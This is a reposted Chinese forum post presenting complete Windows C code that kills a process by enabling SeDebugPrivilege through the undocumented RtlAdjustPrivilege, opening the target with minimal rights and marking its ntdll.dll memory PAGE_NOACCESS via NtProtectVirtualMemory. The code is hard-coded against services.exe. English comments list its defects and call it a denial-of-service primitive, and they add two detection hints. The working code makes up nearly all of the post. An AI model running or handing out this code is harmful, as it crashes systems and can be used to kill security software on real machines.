  • 【转】利用NtProtectVirtualMemory结束进程

    标 题 : 【原创】利用NtProtectVirtualMemory结束进程
    作 者 : KiDebug
    时 间 : 2011-07-13, 09:37:08
    链 接 : http://bbs.pediy.com/showthread.php?t=137067
     
    原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
    /*
    * 【作者:KiDebug】
    * 【空间:http://hi.baidu.com/KiDebug/】
    *  VC 6.0编译出错请百度:“vc 6.0 unicode”
    */
    #include <stdio.h>
    #include <Windows.h>
    #include <Psapi.h>
    #include <Tlhelp32.h>
     
    #pragma comment(lib,"Psapi.lib")
     
    /*
     * Function-pointer types for two undocumented ntdll exports.  Neither is
     * declared in the public SDK headers, so both are resolved at run time
     * with GetProcAddress() (see main()) and stored in the globals below,
     * which stay NULL until main() fills them in.
     *
     * RtlAdjustPrivilege: enables/disables a single privilege on the current
     * process (or thread) token by LUID value; `Enabled` receives the prior
     * state.  Being undocumented, its prototype and behaviour are not
     * guaranteed across Windows versions.
     */
    typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(
    ULONG Privilege,
    BOOLEAN Enable,
    BOOLEAN CurrentThread,
    PBOOLEAN Enabled
    );
    RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;

    /*
     * NtProtectVirtualMemory: native-API counterpart of VirtualProtectEx.
     * BaseAddress and RegionSize are SAL __inout — the call may adjust them
     * (presumably to page granularity; confirm against the target OS) — so
     * callers must not assume they are unchanged afterwards.  OldProtect
     * receives the previous protection.  NewProtectWin32 takes the PAGE_*
     * constants from <Windows.h>.
     */
    typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
        __in HANDLE ProcessHandle,
        __inout PVOID *BaseAddress,
        __inout PSIZE_T RegionSize,
        __in ULONG NewProtectWin32,
        __out PULONG OldProtect
        );
    NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
     
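    /*
     * Return the process ID of the first running process whose image name
     * matches `proc` (case-insensitive, e.g. L"notepad.exe"), found through
     * a Toolhelp process snapshot.
     *
     * Returns 0 when no process matches or the snapshot cannot be taken;
     * callers must treat 0 as "not found" rather than hand it to OpenProcess.
     *
     * Fix: CreateToolhelp32Snapshot reports failure with INVALID_HANDLE_VALUE,
     * not NULL, so the original `if (hSnapshot)` test let a failed snapshot
     * fall through to Process32First and to CloseHandle on a bogus handle.
     */
    ULONG GetPID(WCHAR* proc)
    {
        ULONG targetPid = 0;
        HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

        if (hSnapshot == INVALID_HANDLE_VALUE)
        {
            return 0;
        }

        PROCESSENTRY32 lppe = { 0 };
        lppe.dwSize = sizeof(lppe);  /* Process32First fails without it */

        for (BOOL working = Process32First(hSnapshot, &lppe);
             working;
             working = Process32Next(hSnapshot, &lppe))
        {
            if (_wcsicmp(lppe.szExeFile, proc) == 0)
            {
                targetPid = lppe.th32ProcessID;
                break;
            }
        }

        /* Always release the snapshot, whether or not a match was found. */
        CloseHandle(hSnapshot);
        return targetPid;
    }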
     
     
    /*
     * Entry point.  Applies the technique described above to a hard-coded
     * target (services.exe):
     *   1. read the base address and size of ntdll.dll as mapped in *this*
     *      process;
     *   2. enable privilege 20 (SE_DEBUG_PRIVILEGE) on our own token through
     *      the undocumented RtlAdjustPrivilege, so that OpenProcess on a
     *      system process is permitted;
     *   3. open the target with PROCESS_VM_OPERATION only — the minimum right
     *      NtProtectVirtualMemory needs;
     *   4. set the target's ntdll image to PAGE_NOACCESS, so the target faults
     *      on its next call into ntdll and dies.
     *
     * Step 4 reuses the local ntdll base/size with the *foreign* handle, i.e.
     * the code relies on ntdll being mapped at the same address in every
     * process and never verifies it.
     *
     * Review notes (defects left as-is):
     *   - `void main()` is non-standard C; it should be `int main(void)`.
     *   - GetModuleHandle's result is not checked for NULL before use.
     *   - The return status of RtlAdjustPrivilege and NtProtectVirtualMemory
     *     is ignored, so a failed privilege grant (e.g. non-admin caller) only
     *     surfaces as OpenProcess failing, and a failed protect call is silent.
     *   - GetPID's 0 ("not found") result is passed straight to OpenProcess.
     *   - hProc is never closed; harmless here only because the process exits.
     *
     * Risk / detection notes: services.exe is a critical system process, so a
     * successful run is expected to crash the machine, not just one program —
     * this is a denial-of-service primitive.  The observable artefacts are a
     * non-system image enabling SeDebugPrivilege and then obtaining a
     * PROCESS_VM_OPERATION handle to services.exe; both are worth alerting on.
     */
    void main()
    {
        HMODULE     ntdll;
        MODULEINFO  ModuleInfo;
        ntdll = GetModuleHandle(L"ntdll.dll");
        /* (HANDLE)-1 is the current-process pseudo-handle (GetCurrentProcess()). */
        if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO)))
        {
            return;
        }

        BOOLEAN         Enabled;
        /* Resolve the undocumented export at run time; NULL means not exported. */
        RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
        if (RtlAdjustPrivilege == NULL)
        {
            return;
        }

        /* 20 == SE_DEBUG_PRIVILEGE; Enabled receives the previous state and is
         * otherwise unused.  NTSTATUS result discarded (see notes above). */
        RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);


        /* Hard-coded target.  PROCESS_VM_OPERATION is all the later protect
         * call requires; the handle is never closed. */
        HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe"));
        if (hProc == NULL)
        {
            return;
        }

        NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
        if (NtProtectVirtualMemory == NULL)
        {
            return;
        }

        ULONG   OldProtect;
        /* Base/size come from our own mapping of ntdll (see notes above).
         * Both are __inout and may be modified by the call; the NTSTATUS is
         * discarded, so success is never confirmed. */
        NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect);
    }
  • 原文地址:https://www.cnblogs.com/Lthis/p/4207966.html